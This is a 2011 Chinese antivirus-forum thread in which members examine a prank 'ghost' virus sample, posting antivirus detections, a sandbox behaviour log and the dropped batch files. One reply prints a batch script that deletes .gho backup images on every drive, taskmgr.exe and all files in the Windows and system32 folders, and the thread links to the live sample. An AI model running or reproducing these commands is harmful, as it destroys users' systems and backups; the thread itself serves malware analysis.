查看: 6461|回复: 21
收起左侧

[病毒样本] 请HIPS党和高手帮忙看看这个是不是女鬼病毒?

  [复制链接]
怡宝
发表于 2011-6-6 13:58:31 | 显示全部楼层 |阅读模式
给115传送门!谢谢了!  看看这个是不是女鬼病毒?

http://u.115.com/file/dna7egp7
wuyongliang
头像被屏蔽
发表于 2011-6-6 14:06:19 | 显示全部楼层
AVAST拦截 发现病毒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
绅博周幸
发表于 2011-6-6 14:06:53 | 显示全部楼层
金山查杀
hj5abc
发表于 2011-6-6 14:28:34 | 显示全部楼层
本帖最后由 hj5abc 于 2011-6-6 14:29 编辑

to MSE

伪装svchost.exe进程
a256886572008
发表于 2011-6-6 14:29:43 | 显示全部楼层
单纯恶作剧吓人,还有用脚本删除系统文件
liulangzhecgr
发表于 2011-6-6 14:30:25 | 显示全部楼层
本帖最后由 liulangzhecgr 于 2011-6-6 14:36 编辑

当我看到女鬼病毒的时候顿时感觉到了有趣
的确有点变态,半夜三更遇到这玩意儿也算倒霉的了
不过.......哥突发奇想也写个猛鬼病毒,顺便附带对系统的破坏  (^_^)
纯属技术交流,别把哥想象的那么龌龊哦~~~
My QQnumber:  603953541   &   329209148
病毒定义:Joke.WIN32.PhantomKill    \(^0^)/

-------------------------------------------------------------------------------------------------

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
XMonster
发表于 2011-6-6 14:55:22 | 显示全部楼层
本帖最后由 dm34343667 于 2011-6-6 14:57 编辑






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a256886572008
发表于 2011-6-6 15:48:22 | 显示全部楼层
本帖最后由 a256886572008 于 2011-6-6 16:19 编辑

楼主,我已经提出正常的女鬼,拿去用吧

CAV杀

2011-06-06 14:16:27   C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe   TrojWare.Win32.Agent.pkd@105548638

2011-06-06 15:20:11   C:\Documents and Settings\Roger\Application Data\Phantom\SVCH0ST.EXE   TrojWare.Win32.Agent.pkd@105548638  

2011-06-06 15:21:43   D:\Phantom.exe   TrojWare.Win32.Agent.pkd@105548638  

------------------------------------------------------------

2011-06-06 15:20:02   C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe   Sandboxed As   Partially Limited   

2011-06-06 15:20:04   C:\Documents and Settings\Roger\Application Data\Phantom\SVCH0ST.EXE   Sandboxed As   Partially Limited   

2011-06-06 15:20:11   C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe   Modify File   C:\Documents and Settings\Roger\Application Data\Phantom\SVCH0ST.EXE   

2011-06-06 15:20:12   C:\Documents and Settings\Roger\Application Data\Phantom\path.bat   Sandboxed As   Partially Limited   

2011-06-06 15:20:13   C:\WINDOWS\system32\conime.exe   Sandboxed As   Partially Limited   

2011-06-06 15:20:19   C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe   Modify Key   HKUS\S-1-5-21-1214440339-1682526488-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup   

2011-06-06 15:20:26   C:\Documents and Settings\Roger\桌面\VIRUS\女鬼病毒\Phantom.exe   Modify File   C:\Documents and Settings\Roger\「開始」功能表\程式集\啟動\Corporation.lnk   

2011-06-06 15:21:13   C:\Documents and Settings\Roger\Application Data\Phantom\SVCH0ST.EXE   Modify File   D:\Phantom.exe   


调用批处理作坏事

C:\Documents and Settings\Roger\Application Data\Phantom\path.bat
  1. @echo off

  2.   @set alldrive=Z Y X W V U T S R Q P O N M L K J I H G F E D C

  3.     @md D:\sd\

  4.   @for %%a in (%alldrive%) do (

  5.                                echo . >> %%a:\sd.dr

  6.                                if exist %%a:\sd.dr echo . >> D:\sd\%%a

  7.                                if exist %%a:\sd.dr goto nodis

  8.                                )

  9. :nodis

  10. @exit
复制代码
C:\Documents and Settings\Roger\Application Data\Phantom\Dis.bat
  1. @echo off

  2.   @set alldrive=C D E F G H I J K L M N O P Q R S T U V W X Y Z

  3.   @for %%a in (%alldrive%) do (del /f /s /q %%a:\*.gho)

  4.     @del /f /s /q %SystemRoot%\system32\taskmgr.exe

  5.     @del /f /s /q %SystemRoot%\system32\*.*

  6.     @del /f /s /q %SystemRoot%\*.*

  7. @exit
复制代码
病毒作者的声明
D:\∴Phantom∴.txt
当我看到女鬼病毒的时候顿时感觉到了有趣
的确有点变态,半夜三更遇到这玩意儿也算倒霉的了
不过.......哥突发奇想也写个猛鬼病毒,顺便附带对系统的破坏  (^_^)
纯属技术交流,别把哥想象的那么龌龊哦~~~
My QQnumber:  603953541   &   329209148
病毒定义:Joke.WIN32.PhantomKill    \(^0^)/

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
怡宝
 楼主| 发表于 2011-6-6 15:57:25 | 显示全部楼层
本帖最后由 怡宝 于 2011-6-6 15:58 编辑
a256886572008 发表于 2011-6-6 15:48
楼主,我已经提出正常的女鬼,拿去用吧


感谢!不过顺便问下,这个女鬼病毒,是会在关机状态下自动开机并且启动的么?它修改哪个注册表做到的?我记得要自动开机好像得设置BIOS的哇?这毒能在windows7下运行么?  下载的你给的这个正常女鬼,360网盾报安全。。   额,刚打开你提取出来的看了,是图片和声音文件,呵呵,是说咋个报安全
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-16 02:54 , Processed in 0.119935 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表